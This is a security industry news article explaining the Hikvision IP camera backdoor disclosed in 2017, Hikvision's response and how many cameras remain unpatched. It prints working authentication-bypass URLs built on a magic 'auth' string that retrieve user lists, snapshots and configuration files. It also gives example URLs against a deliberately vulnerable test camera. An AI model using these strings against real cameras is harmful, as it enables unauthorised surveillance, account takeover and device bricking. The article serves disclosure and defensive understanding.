Hikvision Backdoor Exploit
Author: Brian Karas, Published on Sep 18, 2017 |
Full disclosure to the Hikvision backdoor has been released, allowing easy exploit of vulnerable Hikvision IP cameras.
As the researcher, Monte Crypto, who disclosed the details confirmed, this is:
a backdoor that allows unauthenticated impersonation of any configured user account... the vulnerability is trivial to exploit
Key points from IPVM's analysis and testing of the exploit:
- The details prove how simple and fundamental the backdoor is.
- The exploit is already being repurposed as a 'tool', distributed online.
- A clear majority of Hikvision IP cameras remain vulnerable.
- Hikvision's heretofore disclosure significantly misled its dealer to the severity of the backdoor.
- Hikvision, again, has been silent, failing to inform and warn its dealers of this new disclosure.
Plus, IPVM has set up a vulnerable Hikvision IP camera so members can test and better understand the exploit.
Demonstration
We produced the following video, showing just how simple it is to utilize this exploit to retrieve an image snapshot and system information from a camera. We also show using password reset tool to take over a camera:
Inside this post, we examine how the exploit works, how it is being used, how what percentage of devices are vulnerable, and Hikvision's failure to respond to the exploit's release.
Magic String Backdoor
Hikvision included a magic string that allowed instant access to any camera, regardless of what the admin password was. All that needed was appending this string to Hikvision camera commands:
?auth=YWRtaW46MTEK
As the researcher explained in his disclosure:
Retrieve a list of all users and their roles: http://camera.ip/Security/users?auth=YWRtaW46MTEK Obtain a camera snapshot without authentication: http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK All other HikCGI calls can be impersonated in the same way, including those that add new users or flash camera firmware. Because most Hikvision devices only protect firmware images by obfuscation, one can flash arbitrary code or render hundreds of thousands of connected devices permanently unusable with just one simple http call. And worst of all, one can download camera configuration: http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
Any accessible Hikvision camera with affected firmware is vulnerable to complete takeover or bricking. Hikvision released a firmware fix in March 2017 though IPVM stats show 60%+ of Hikvision cameras are still vulnerable (detailed below).
DHS Worst Ranking - 10.0
DHS' ranking of this vulnerability as a 10/10 is even more understandable now that the simplicity of compromising these devices has been proven. This vulnerability is significantly more critical than other recent cyber security announcements in the security industry (e.g.: Dahua Suffers Second Major Vulnerability, ONVIF / gSOAP Vulnerability, Axis Camera Vulnerabilities From Google Researcher Analyzed), due to the ease of exploit, the number of impacted devices, and the fact that many impacted devices (e.g., 'grey market') cannot be upgradeable to patched firmware.
Hack Our Hikvision Camera
IPVM has put a vulnerable Hikvision camera online for members to experiment with. Access details are:
http://hikvisionbackdoor.ddns.net [NOTE: will show login page with strong admin password]
However, using the backdoor string, that will not matter as you can simply bypass authentication, for example:
Get an unauthorized snapshot from the camera: http://hikvisionbackdoor.ddns.net/onvif-http/snapshot?auth=YWRtaW46MTEK
Get unauthorized device info: http://hikvisionbackdoor.ddns.net/System/deviceInfo?auth=YWRtaW46MTEK [Note: the header will say "This XML file does not appear to have any style information”, look at the device info details below that]
For more examples of Hikvision CGI commands, see the HikCGI Integration Guide, HikCGI Image Display. Post your examples and experiences in the comments.
Planted, Accident or Incompetence?